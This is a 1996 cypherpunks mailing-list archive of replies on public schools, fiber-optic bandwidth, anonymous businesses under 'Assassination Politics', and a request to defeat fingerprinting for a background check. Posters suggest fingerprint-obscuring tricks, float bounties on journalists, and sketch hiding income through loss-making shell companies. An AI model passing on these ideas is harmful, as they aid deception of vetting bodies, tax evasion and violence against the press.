involves material that portrays sadistic or masochistic conduct 
or other depictions of violence, increase by 4 levels; and if a
computer was used to transport or ship the visual depiction,
 increase by 2 levels.)  (The Sentencing Table can be found at
http://www.ussc.gov.)

About the Author -  Paul D. Cardin, P.A

**Member of the Board of Directors of Oklahomans for Children 
And Families (OCAF). 
**Author of The Agincourt Project - the electronic expose that
explains how Internet Service Providers (ISPs) are responsible 
for the distribution of illegal pornography and child pornography
throughout America.  (You may obtain a copy of The Agincourt
Project via autoresponder e-mail by sending a blank e-mail 
message to noporn@mailback.com).
** Architect of the most effective and successful campaign in the
United States today to stop the electronic distribution of illegal
pornography and child pornography.
** National Directorship soon to be announced.

About the Regular Features -

**America's Most Wanted - A list of public corporations that are 
the enemies of America's children and families because of their
continued electronic distribution of illegal pornography and child
pornography.
**(Your State Here)'s Most Wanted - A state by state list of ISPs
 that are the enemies of children and families because of their
continued electronic distribution of illegal pornography and child
pornography.
**Commentary - Incisive and hard hitting analysis of the legal and
constitutional issues facing the Internet today. 
** Battle Reports - Updates from the front lines, from "war
correspondents" across the country.
***** The court battles over the Communications Decency Amendment.
***** The status of OCAF against the Oklahoma ISPs.
***** The status of Loving v. Boren - is it a ridiculous waste of
taxpayers money or will it be the definitive Internet court ruling?
*****The status of other important electronic obscenity court cases.
*****The status of battles yet to be engaged.

About Special Reports - 

**Testimonies from the victims of pornography.
** Profiles of the men and women  who are engaged in the battle 
to free our society from its plague.
**Interviews with law enforcement officers, prosecutors, and ISPs.

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  

The Top Ten Reasons TO SUBSCRIBE To "Level30" -

**Reason #10 -  You are an INTERNET SERVICE PROVIDER who wants
 to stop violating federal and state obscenity and child pornography
laws. 
**Reason #9 - You are a LAW ENFORCEMENT OFFICER or PROSECUTOR
who wants to learn how to stop ISPs from violating federal and state
obscenity and child pornography laws
** Reason #8 - You are a PUBLIC OFFICIAL who wants to learn how to
keep illegal pornography and child pornography off of publicly owned
and operated computer systems.
** Reason #7 - You are a UNIVERSITY OFFICIAL or LIBRARY OFFICIAL
who wants to learn how to keep illegal pornography and child
pornography off of your university or library computer system.
**Reason #6 - You are a SCHOOL OFFICIAL or TEACHER who wants to 
learn how to keep illegal pornography and child pornography off of
your school's computer system.
**Reason #5 - You belong to a CHILD ADVOCACY or WOMEN's RIGHTS 
group and you want  to learn how to fight illegal pornography and
child pornography on the Internet.
**Reason #4 - You belong to a CHURCH or RELIGIOUS GROUP and you 
want to learn how to fight illegal pornography and child pornography
on the Internet.
**Reason #3 - You are a CORPORATE EXECUTIVE or PR OFFICER who 
wants to learn how to avoid extremely damaging publicity for your
company.
**Reason #2 - You are a REPORTER who wants to stay one step ahead of
numbers 3 through 10 above

And, finally.......

**Reason #1 - You are a PARENT or GRANDPARENT who wants to learn
more about how to keep the Internet safe for your children and/or
grandchildren.

SUBSCRIBE TODAY









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 16 May 1996 10:56:52 +0800
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: Edited Edupage, 9 May 1996
In-Reply-To: <doug-9604151409.AA00354281@netman.eng.auburn.edu>
Message-ID: <199605151612.MAA02550@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



As long as this is now CypherCesspit and not CypherPunks, I might as
well play the game.

Doug Hughes writes:
> >If you feel like subsidising education, then by all means, do it.  
> >But why should you stick a gun in my back to do the same?  What if I 
> >do not want to do the same as you?
>
> Then you will be living in a country with lower education standards, 
> increasing illiteracy, and a pretty pitiful base with a declining
> socio-economic structure.

What, like the one we live in NOW?

As I said, things have gotten steadily worse since Horace Mann
invented the modern government socialization institution we call the
"public school". (It was originally created to force the horrible
subhuman Irish and Germans to send their kids to places where good
protestant values would be inculcated into them, not as a way to
increase the literacy rate. Check on your own if you don't believe
me.)

Every year since World War II, expenditures in real dollars have
increased per pupil at the government schools. Every year, average
class size has gone down in the government schools. Indeed, year after
year, the demands of the education mafia are always met. Who, after
all, would dare deny anything to the poor children.

Of course, almost every year, educational quality has declined.

Has it occurred to you that something is probably wrong with your
world model when in spite of the fact that everything the education
mafia asks for is granted they can't deliver the goods?

Maybe if New York City spends $20,000 a year per student instead of
the $10,000 they spend now things will get better? One wonders why the
parochial schools get away with spending only $2500 and yet deliver a
better education.

> >> So, because they live in a poor district they are
> >> not entitled to the same level of education as a rich city suburb? 
> >> The illiteracy rate in Alabama is 40%! This is just plain sick!
> >
> >When I was a kid, everything that had characters printed on it was 
> >readable.  Who is *preventing* them from reading?
> 
> environment, lack of education, lack of money, lots of factors.

I learned to read outside of school. I realize I had a privileged
background -- my parents being literate and all -- but in fact I'll
note that my parents claim that they didn't teach me to read, the
goddamnoisybabblebox did. One day I just started reading at them and
they were shocked as could be.

Perhaps its this sort of thing, and the fact that the literacy rate
was higher BEFORE public education, that lead me to believe that we
don't need any more "assistance" from the friendly neighborhood
government. We need less, a lot less, and as fast as possible.

> Nobody is holding a gun to anybody's head saying "Don't Read". But
> improving literacy is a goal that needs to be undertaken. Do you not
> agree that low literacy is a bad thing and needs to be taken care
> of?

I agree that it is bad that some people do not know how to read, but
the cost is mostly paid for by them except when society decides to
"help the unfortunate". Even then, it is the illiterate who can't get
a job, not me. Literacy is a private good, not a public good.

If you would like to see an improvement in literacy I therefore have a
simple solution. Eliminate public schools. The literacy rate has been
in steady decline since Horace Mann's lovely innovation. With only
private schools available, teachers will live in terror of being fired
for being ineffective. Schools that don't teach children the skills
their poor parents scrimp and save for will lose their
students. Incompetant fools will no longer be tolerated. The schools
will cease to spend time teaching random socialist fluff and will
become businesses hired to inculcate skills like reading, mathematics
and reasoning ability -- or they will be fired.

I live in hope that some day schools will be forced to go begging for
students, and will find themselves faced with questions like "if
Johnson Elementary across town can teach my kid for $500 less a year
and teach him to read a year earlier in a safer environment, why the
hell should I pay incompetant dweebs like you?" I long for the day
when Albert Shanker and the entire teachers union hierarchy is forced
to sweep streets for lack of any other job that anyone will offer
them.

So, yes, I want to see education improved. The answer in my mind is to
fire the entire government.

> I'd have to be convinced that that is a good thing. However, making
> sure everybody has a good education is of paramount importance to
> any society. It's going to cost some tax dollars, but, in my opinion
> it would be money well spent

Housing is of paramount importance to society. Do you feel that you
would like to live in government housing projects over a privately
owned apartment?

Food is of paramount importance to society. Why do we have no
government run feeding stations to replace these evil supermarkets,
then?

Heat is of paramount importance to society -- in New England you can't
survive the winter without it. Why, then, do we not have government
operated and financed oil companies to replace the evil private ones.

Communications are of primary importance to society. Would you swap
our phone system for the phone system in Greece, or even the one in
France, which are publically subsidized and run by the government?

Do you prefer using the U.S. Postal Service, or Federal Express when
you absolutely positively have to get the package there?

If you had a choice, would you go to a V.A."hospital" or see a private
physician?

In short, why do you think the government, which fucks* up everything
it touches, and which has controlled education for a century, is the
answer to fixing the education problem, when it so obviously is the
CAUSE of the education problem?

(*intentionally placed to provide CDA fodder.)

> Some people on this list argue that the current representative govt
> system is bad, and that true democracy is better.

Actually, I believe most people on this list argue for no government
or so little that its decisions hardly matter.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Thu, 16 May 1996 12:52:08 +0800
To: cypherpunks@toad.com
Subject: Re: Fingerprinting annoyance
In-Reply-To: <Pine.SUN.3.93.960514091808.3611A-100000@polaris.mindport.net>
Message-ID: <Pine.3.89.9605151210.A27377-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 14 May 1996, Black Unicorn wrote:

> On Mon, 13 May 1996, Paul S. Penrod wrote:
> 
> > 
> > 
> > On Mon, 13 May 1996, Senator Exon wrote:
> > 
> > > in connection with a character and fitness report i have been
> > > asked to supply a review board with a set of my fingerprints
> > > i have never been fingerprinted before
> > > i am not very keen on the idea now
> > > of course refusing will attract suspicion
> > > short of getting someone else to put their fingers in ink for
> > > me does anyone have a cute method by which to obscure my prints
> > > on those cute little cards without it being obvious?
> > > i can fill out and manipulate the card myself i just need a
> > > working method.
> > > is there no privacy advocate who can help me?
> > > 
> > 
> > First off, if you were born in the US, they have your feet and/or hand 
> > prints on record.
> 
> Incorrect.
> Several states do not bother to print infants at birth.
> Several hospitals do not bother to follow state guidelines in those states
> which do so require.

Which ones specifically?

> 
> It is one of the great advantages of the United States that no
> standardized procedure for person identification exists.  Seals and
> certificates vary from jurisdiction to jurisdiction.  Cross the border to
> a state and a hospital birth annoucement is enough for a drivers license,
> cross again and 4 pieces and a note from mom isn't enough.
> 
> Be careful with disinformation please.
> 

My point is not about the variance of seals and certificates (I have at 
least 6 different ones prove it from 4 different states). That is a 
given. It is that prints have been a generally accepted practice for some 
time now. IF you want to make the case and go back to the early days 
(pre-WWII), then people like attila and a few others don't have them - 
and I'll concede the point on that basis.

The information I received has come from inquiries to folks I know within 
the AMA, several different hospital adminstration staff in various states 
- whose job it is to handle such affairs, and few other people who make 
it their business to know such trivia. IF the information is in error, 
I'll gladly accept correct input. Next time, don't be so quick to accuse 
without inquirying to context. I'm not J.Bell.

...Paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 16 May 1996 12:08:21 +0800
To: cypherpunks@toad.com
Subject: Re: Why does the state still stand:
Message-ID: <9605151745.AA23065@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 15 May 96 at 0:45, Ed Carp wrote:

> The problem, however, is twofold - (1) the government will
> play mind games on the rest of the population to make you look like
> a terrorist, or whatever turns the populace against you,

Well, first of all, we should find how much of the population
*really* believe in what govt says.  There is a difference between
the politically correct opinion that Joe & Jane Public give to a
poll interviewer and what they really think.

Second, you suppose that Joe & Jane Public really like and approve what 
they understand from what the medias say.

And finally third, this system does not work according to the will
of a majority.  It wouldn't take too many peoples who believe that the
medias and their perceived lack of integrity is widely responsible
for the way the world goes right now, to have a substantial prize put
on the head of the medias.

Therefore, any journalist with two+ working neurons will realize
that sticking to the most objective facts available would be the best
way to build a great reputation while sticking to govt propaganda
would be a great way to attract a prize on his head. 


> and (2) the
> government tends to use a sledgehammer to crack a walnut.  They
> don't care what kind of collateral damage they inflict (witness Waco
> and Ruby Ridge) as long as they can make their point.

If peoples decided to put a prize on the medias or some
jounalists *before* they do on the govt, it might very well undercut
many of the counterattack any govt might have.

Among the ways a govt would have to circumvent that might be:
- create their own medias and have tight security and anonymity
- forbid the press from reporting certain events
- etc.

(Again, many counter arguments have as a basic premise that the 
populace is stupid.  I do not believe the contrary, I simply say that 
I do not know.  Future will show.)

So, to see how AP will make the system evolve, you have to assess
the communication capabilities of govt vs the individual.  This is
central to AP and the nature of actual govts.  This is *why* the
internet is *so* dangerous to any govts that seek to either retain or
increase their power, even if it actually touches only but a tiny 
portion of world population.

For the first time in the history of humanity, we have a peer to
peer communication capability and an individual-to-world broadcasting
capability that is not controllable in practice by any other entity
(such as law, high finance, etc)


The explains fully why the various govts what to find a way to 
enforce internet laws, breakable crypto schemes and non-anonymous 
protocols.


JFA
PLEASE NOTE: THIS POST DOES NOT MEAN THAT I ENDORSE MR. BELL'S
SYSTEM.  MY RATIONNAL CONCLUSIONS ABOUT IT'S INTERNAL MECHANICS
AND IT'S INTRINSIC LOGICS DOES NOT MEAN THAT I LIKE NOR ENDORSE
THE SYSTEM. I SIMPLY CONCLUDED THAT IT IS IMPOSSIBLE TO PREVENT
THE SYSTEM FROM BEING IMPLEMENTED.  IMO, IT IS UNAVOIDABLE.

 DePompadour, Societe d'Importation Ltee  
 Limoges porcelain, Silverware and mouth blown crystal glasses

 JFA Technologies, R&D consultants.
 Physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 16 May 1996 13:24:08 +0800
To: cypherpunks@toad.com
Subject: RE: Why does the state still stand:
Message-ID: <9605151745.AB23065@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 14 May 96 at 22:01, blanc wrote:

> From: 	Hal [on the idea of companies operating fully anonymously]
> 
> It might be interesting to make a list of all the problems people
> can think of why this idea won't work, paired with proposed
> solutions and workarounds - sort of a mini FAQ for this important
> (some might say ultimate) cypherpunk model.
> ....................................................................
> 
> 
> I think this is a much needed discussion  - in particular as it
> comes at a time when Uni is is "somewhat disconcerted" at the
> defeatist attitude of some cypherpunks and since TCMay is getting
> ready to read us the Cypherpunks Bill of Rights regarding the
> subsidizatoin of other's people's cyber existence (heh). 
> 
> 3 problems which immediately come to mind:
> 
> .  What if someone, hired on one occasion but fired at another,
> decides in anger to "turn coat" and report everyone to the IRS (or
> other fine government agency)?
> 
> .  What if a company does not pay as expected - other than adopting
> Assassination Politics, what method could an employee use towards
> getting their expected remuneration for work done?

The nature of anonimity, IMO, precludes any legal mechanism since the 
anonymity structure was established precisely to avoid any legal 
consequences.

Here, I might be tempted to differeciate between two cases:
1) the entity who wants to get out of the reach of the governmental 
system
2) the entity who wants to get out of the reach of everybody (to con 
others)

The only problem is, how will you differentiate between 1) and 2) 
*before* a conflict arises?

  The involved party would then have to resort to use 
some sort of unofficial tribunal.  It would create a set of parrallel 
law system, and as much of them as there would be groups doing 
business together.

Again, depending on the context, AP might wery well be the only 
solution or be no workable solution at all.

But here, I think that AP would be the single most important factor
ruling the socio-economical behavior of individuals or entities in
the world.  It already works that way in many countries of the
world, especially in south america.  In many places, you don't screw
around too much or you get killed.  As a friend of mine who lived in
the jungle told me "if a guy fools around with you wife, you just
shut up and take it, but if a guy fools around with your girlfriend,
you have the sorcerer mix you a beverage...  One of my friend had
one and he died within ten days..."

He said: "This system might very well go against our common moral
principles, but in theses places, you can leave anything on the
public place for several days and when you come back, it'll still be
there.  In theses countries, when you give your word, it *is*
binding.  Most business deals are simply verbal and there is an
astonishing low level of defaulting on them.  Thoses who tend to
default dishonestly tend very much to die quickly.  In thoses
countries, no con man ever survives."

 
> .  Wouldn't everyone need to have two jobs (or source of regularly
> accepted cash), in order to be able to pay for services where
> suppliers do not accept virtual cash transactions? (TCM has
> mentioned before about the need to pay for some things in tiny
> quantities - like quarters for a phone call, etc.)

Any physical currency can be made traceable (put a chemical or
radioactive tracer or a zillion other tricks...)

JFA
PLEASE NOTE: THIS POST DOES NOT MEAN THAT I ENDORSE MR. BELL'S
SYSTEM.  MY RATIONNAL CONCLUSIONS ABOUT IT'S INTERNAL MECHANICS
AND IT'S INTRINSIC LOGICS DOES NOT MEAN THAT I LIKE NOR ENDORSE
THE SYSTEM. I SIMPLY CONCLUDED THAT IT IS IMPOSSIBLE TO PREVENT
THE SYSTEM FROM BEING IMPLEMENTED.  IMO, IT IS UNAVOIDABLE.

 DePompadour, Societe d'Importation Ltee  
 Limoges porcelain, Silverware and mouth blown crystal glasses

 JFA Technologies, R&D consultants.
 Physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 16 May 1996 13:44:16 +0800
To: cypherpunks@toad.com
Subject: Re: Past one terabit/second on fiber
Message-ID: <199605151935.MAA15182@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:44 AM 5/15/96 CDT, Daniel R. Oelke wrote:

>> "Wow", I said.  Far faster than the 2.5 Gb/sec transmission that is 
>> currently fairly standard for long-haul fiber trunks. 
>
>The ads say they are selling it - that doesn't mean shipping it... yet
>at least.  (Note that my employer is a direct competitor of Lucent 
>so I have a vested interest in setting the facts straight)

Yes, I should clarify that the article indicated that the whole system will 
be available in the "second quarter of 1996."  They say the fiber itself, 
"TrueWave" is available now.

>
>> I wasn't prepared, however, for page 38, in an article titled "Research 
>> Teams Achieve 1 Trillion bits a Second."  In fact, three separate groups 
did 
>> this.  I copy the article below.
>
>Yes - this is still very much a lab situation only though.
>It will be quite a few years before we hit that in real systems.

True.  In fact, it may be that we simply don't need that rate of 
transmission yet.  Maybe somebody familiar with routers can tell us what 
kind of CPU horsepower would be required to do that effectively.  Economics 
dictates that such an extraordinarily fast and multiplexed system would only 
be used when it is cheaper than the alternative, using multiple lower-speed 
fibers.  If anything, I think the main impediment to the use of the higher 
rates is fact that fiber signals must be broken down whereever the fiber is 
terminated, and the cost of that termination would be astronomical if it had 
to handle 1 Tb/s.  Chances are good that one of the few places that such a 
system would be economical would be long-haul undersea cables where 
breakouts are rare and terminations are few.

>> Even if we only consider that 20 Gb/second fiber from Lucent, that is 
>> equivalent to about 300,000 simultaneous voice calls.  
>
>An OC48 signal (~2.5 Gb/sec) will handle 48 T3's or 48 * 672 voice calls.
>Multiply by 8 for 20 Gb/second and you get 258048 voice calls.
>Pretty close to 300k I guess.

I was figuring they'd cut out silences...as well as echo-suppression 
cutouts.   Do they still do this?  Given modern fiber's capacity, I wonder 
if they bother.

>I don't know that any number fiber cable is "standard" but 
>36-fiber cable is not unusual.  To find the capacity of a cable, you
>have to cut the number of fibers in half (as you did) because
>generally each fiber is used only for a single direction of traffic.
>You then have to cut it in half again because phone companies have 
>everything redundant.  So, for a connection between two cities,
>there are generally 2 cables in different locations (so one backhoe
>doesn't get both), with on average only 1/2 the fibers in each carrying 
>paying traffic.

There's also a lot of 'dark fiber' out there, right?  Fiber laid as 
part of a cable but not activated, because it's not yet needed.  I got a 
look at a segment of the operation that laid a cable from Seattle (Vancouver 
BC?) to around San Francisco, about 5 years ago.  Got a chance to talk to an 
engineer, and ask a bunch of technical questions.  They laid three smaller 
(2" or so) plastic tubes in a larger outer tube, and the engineer said 
they'd later blow a cable through a single tube with compressed air.  He 
said they had no current plans to fill the other two tubes, because of lack 
of need.  And at the rate the fiber companies are improving transmission 
rates, it is unclear whether they will ever run out of capacity in such 
situations.


>> If we assume that the fiber cable costs $1/meter per fiber, and the cost of 
>> trenching, burial, and interconnects raise this to $10/meter/fiber, and if 
>> we generously assume that the average LD call goes 3000 miles (5,000,000m), 
>> that call occupies 1/150,000th of a $50 million fiber for a few minutes.  
If 
>> we suppose that the fiber has to gross $100,000,000 per year to pay for 
>> itself, and even if it's only operating at an average 10% load level(both 
>> assumptions are pessimistic, that only works out to a cost of 1.3 cents per 
>> minute per call.  That's why these LD phone companies are so scared:  If we 
>> can transmit Internet on fiber, that fiber can accept this extra traffic at 
>> very low marginal cost.
>
>I can't vouch much for your cost numbers - other than to apply the 
>factor of 2 adjustment noted above. 

My numbers are not totally a WAG (wild-ass guess) but they are probably out 
of date even if they had any resemblence to the truth a few years ago.  I'd 
appreciate hearing more accurate figures if you know them.  Don't divulge 
company secrets or anything; I'm only interested in ballpark figures for the 
industry as a whole.

> I would add that much of a 
>phone companies cost is in billing and customer service, etc.
>Not the cost of installing and maintaining the fiber and equipement.

This suggests that there would be a market for a LD phone company that 
charged, say, a yearly payment of $200-300 for essentially unlimited use.  (The main 
impediment to this would be regulatory; as I understand it LD companies have 
to pay local telco's for connections on a per-minute connect basis.  Is that 
right?  This needs to get fixed.)   Their billing costs would be very small. 


>Internet telephony should make the use of bandwidth even more
>efficient - thereby cutting costs.  The big guys who own
>the fibers will still make money - the pipes that carry internet
>traffic are still needed.  But the little guys will get squeezed out.
>(until they become ISPs ;-).  Internet traffic could theoretically
>be carried over this large amount of protection fiber (mentioned above)
>that is out there for a much lower marginal cost than the current 
>T3 or OC3 pipes that are being used.  The only "problem" being that these
>are lower priority channels, so that if a failure occurs anywhere,
>the traffic on them is dropped.  Most customers are demanding 
>high uptimes so much that the idea of a very lost cost, 
>but much less reliable service hasn't caught on yet.

I think the market will have to migrate towards such services.  A backup 
fiber is an asset whose capacity can be easily "mined" for a substantial 
payback.  True, its availability is not particularly reliable, but that's 
exactly what the Internet was intended to be able to use, right?  I suspect 
that the real reason Internet hasn't migrated to such transmission systems 
is simply that its needs still don't demand anywhere close to the 
current-available fiber technology.  However, if traffic is tripling per 
year we'll need to see a substantial migration to full-fiber links within 
3-5 years.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Thu, 16 May 1996 15:36:40 +0800
To: cypherpunks@toad.com
Subject: Re: Fingerprinting annoyance
In-Reply-To: <Pine.SUN.3.93.960514093526.3611C-100000@polaris.mindport.net>
Message-ID: <Pine.3.89.9605151204.A27377-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 14 May 1996, Black Unicorn wrote:

> On Mon, 13 May 1996, Paul S. Penrod wrote:
> 
> > 
> > 
> > On Mon, 13 May 1996, Mark O. Aldrich wrote:
> > 
> > > On Mon, 13 May 1996, Senator Exon wrote:
> > > 
> > > <snip>
> > > > i can fill out and manipulate the card myself i just need a
> > > > working method.
> > > > is there no privacy advocate who can help me?
> 
> [...]
> 
> > > If you're forced to do this in person with a tech, you can continuously 
> > > "fight" the grip they have on your hand and smudge the card.  However, 
> > > they'll not submit the card until the prints are "good," so this sort of 
> > > betrays your intent of at least appearing to cooperate with them.  In the 
> > > law enforcement community, they are taught how to take prints by force 
> > > but it's unlikely that your tech will attempt any such technique.
> > > 
> > 
> > I know of no such instance (other than some informal "fingerprint the 
> > kiddies for safety" schtick) where it's a do-it--yourself operation. 
> 
> Not _technically_ perhaps.  But in most cases it's a
> go-down-to-the-police-station-and-have-them-sign-the-card operation.  Who
> is it that can tell a random signature from a police signature exactly?
> Like I said, standard print cards are available at the GPO.

Thats fine, but tell me it's going to play at the clearance level...It 
won't.

> 
> > While the methods listed are clever, they and many other finaglings are 
> > the main reason it's done in the "light of day" by a tech.
> 
> Or _theoretically_ done in the light of day by a tech.
> 
> > > You can mutilate the tips of your fingers so that prints cannot be 
> > > acquired, but this hurts.  Badly.
> > 
> > Doesn't always work. Partials can be extrapolated to yield a relative match.
> 
> Depends on what you are looking to do.  If your goal is to deter random
> searching through a national database, mutilation will probably be very
> effective.  If they have the prints of the murderer (you) and you're a
> suspect, mutilation aside from actually removing the fingers isn't going
> to do anything.

If there is a serious crime involved, partials are sufficient to make the 
"guest list" if there are other mitigating factors to even suspect you 
might be involved. That's doesn't mean you'll make it to the top, but it 
can certainly cause some painful scrutiny.

> 
> > > 
> > > You could get some false latex coverings for your finger tips, but they'd 
> > > have to be damn good to fool a tech.  Likely to cost big bucks, too.
> > 
> > Wont work. The hands are checked first for signs of tampering.
> 
> See above about tech end around.

Again, process will work, but not allowed in context of clearance.

> 
> > > 
> > > I know of no chemical or physical "pre-treatment" that can be used to 
> > > hack the ink transference process.  Perhaps one of the chemists here on 
> > > the list might know of some good technique.
> > 
> > Pineapple juice and other weak acidic subtances ruin the ridges on the 
> > finger tips causing them to smear or not show at all. Unfortunately, this 
> > takes a period of time and constant handling of such items.
> 
> This is interesting.  I suspect that you'd have to have major damage to
> the ridges however.
> 

There needs to be suffcient damage to the ridges by some chemical or 
mechanical means (sand paper, concrete, brick, etc.) to remove the 
distiguishing ridges, and not replace them with a traceable pattern of 
any kind. 

Scraping the fingertips runs the risk of leaving trace marks that are 
just as good as the ridges you tried to remove - even better if you've 
left finger prints as a result. The point to the game is not to search 
any database, but to produce a verifiable match with evidence at the 
scene of any crime. In the case of a clearance, it is to start or 
validate an identification process. IF validation is unobtainable via 
fingerprints, then the issuing body can employ other means (such as 
retinal scans) or deny clearance all together.

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Thu, 16 May 1996 13:16:14 +0800
To: cypherpunks@toad.com
Subject: Re: Fingerprinting annoyance
In-Reply-To: <Pine.SUN.3.93.960514093954.3611D-100000@polaris.mindport.net>
Message-ID: <Pine.3.89.9605151205.A27377-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 14 May 1996, Black Unicorn wrote:

> On Mon, 13 May 1996, Paul S. Penrod wrote:
> 
> > 
> > 
> > On Mon, 13 May 1996, Senator Exon wrote:
> > 
> > > in connection with a character and fitness report i have been
> > > asked to supply a review board with a set of my fingerprints
> > > i have never been fingerprinted before
> > > i am not very keen on the idea now
> > > of course refusing will attract suspicion
> > > short of getting someone else to put their fingers in ink for
> > > me does anyone have a cute method by which to obscure my prints
> > > on those cute little cards without it being obvious?
> > > i can fill out and manipulate the card myself i just need a
> > > working method.
> > > is there no privacy advocate who can help me?
> > > 
> > 
> > First off, if you were born in the US, they have your feet and/or hand 
> > prints on record. Secondly, fingerprints are not an absolute proof 
> > positive means of identification. They are sufficiently unique enough 
> > that it satisfies the statistical error acceptability for many 
> > governmental agencies.
> > 
> > I wouldn't worry about it personally. There are more effective ways of 
> > getting around such things if you really need to. If you don't have any 
> > historical baggage, then don't make waves.
> 
> More effective?  Why not share them with the list?  The guy obviously IS
> worried about it, and maybe reasonably so.
> 

Yes.

No, and for obvious reasons.

If the guy is worried because he is paranoid, then that is his reality. 
It's not as difficult as you might think to find someone if you really 
want to - with or without fingerprints.

If he is paranoid because he has baggage, then that is also his problem. 
We live by our own choices everyday - both good and bad. There are some 
consequences that take time to catch up with us, and some of those are 
unavoidable.

If the job is worth it to him, then he will submit - otherwise there are 
lots of other places to work that don't require printing.

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 16 May 1996 11:52:01 +0800
To: cypherpunks@toad.com
Subject: Re: Rural Datafication (Was Re: Edited Edupage, 9 May 1996)
Message-ID: <9605151815.AA25152@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 14 May 96 at 19:35, Timothy C. May wrote:

 
> (This is having yet another interesting side effect: the wealthy who
> can afford digital DSS dishes are suddenly very uninterested in
> local cable problems, and the impetus for improvement is lost.
> Obviously the "poor" are then left with a decaying, outmoded
> infrastructure. Even as a Darwinian, I have to feel for them. They
> got sold a bill of goods, about how awarding "the franchise" to TCI
> or Sonic or Galactronic Cable would result in "universal access,"
> and now they're stuck.)

Hey Tim, where are your badwith-saving manners?
You should simply have said :

"You asked for it, brother..." ?

;-)

Regards!

JFA

 DePompadour, Societe d'Importation Ltee  
 Limoges porcelain, Silverware and mouth blown crystal glasses

 JFA Technologies, R&D consultants.
 Physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 16 May 1996 11:25:35 +0800
To: blanc <blancw@accessone.com>
Subject: RE: Why does the state still stand:
In-Reply-To: <01BB41E0.DE17C4C0@blancw.accessone.com>
Message-ID: <Pine.SUN.3.93.960515125826.328B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 May 1996, blanc wrote:

> From: 	Hal [on the idea of companies operating fully anonymously]
> 
> It might be interesting to make a list of all the problems people can
> think of why this idea won't work, paired with proposed solutions and
> workarounds - sort of a mini FAQ for this important (some might say
> ultimate) cypherpunk model.
> .....................................................................
> 
> I think this is a much needed discussion  - in particular as it comes at a time when Uni is is "somewhat disconcerted" at the defeatist attitude of some cypherpunks and since TCMay is getting ready to read us the Cypherpunks Bill of Rights regarding the subsidizatoin of other's people's cyber existence (heh). 
> 
> 3 problems which immediately come to mind:
> 
> .  What if someone, hired on one occasion but fired at another, decides
in anger to "turn coat" and report everyone to the IRS (or other fine
government agency)?

The entire organization would clearly have to be double blinded.  If this
can be done for mailing lists (which I believe it can) it can be done for
corporations too.  The real trick is getting the costs of anonymous (and I
mean secure anonymous) communications low enough.

> 
> .  What if a company does not pay as expected - other than adopting
> Assassination Politics, what method could an employee use towards
> getting their expected remuneration for work done?

If payment is made weekly, it should be made in advance to an escrow agent
who would issue a certificate that the payment for employee r2dd54 has
been received.  The payment would then not be released to anyone without
the consent of the corporation and the employee.

Obviously the escrow agent would have to be trusted.

This prevents an anonymous employee from running off with money without
working and prevents an anonymous corporation from screwing the employee.

Even if a payment gets hung up in a dispute, it's only for a week.

You could break the payments into monthly, or bi yearly or however you
like.

> .  Wouldn't everyone need to have two jobs (or source of regularly
> accepted cash), in order to be able to pay for services where suppliers
> do not accept virtual cash transactions? (TCM has mentioned before about
> the need to pay for some things in tiny quantities - like quarters for a
> phone call, etc.)

This is what unemployment is for.  No reported income = no job = get
portions of your previously paid tax back before you die.

In addition, why not exchange virutal cash for spending money offshore and
have it forwarded to you?

It's not hard to hide the kind of small pure cash transactions that day to
day living requires (Food, telephone, etc).  The only problem is the large
purchases which require reportable type transactions.

For these a company running at a constant net operating loss could be
formed to purchase cars for resale (funny how no one ever buys them) and
manage property (which no one seems to ever lease).

>      ..
> Blanc

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 16 May 1996 13:42:18 +0800
To: cypherpunks@toad.com
Subject: (Fwd) Mail Delivery Failure.
Message-ID: <9605151817.AA25239@cti02.citenet.net>
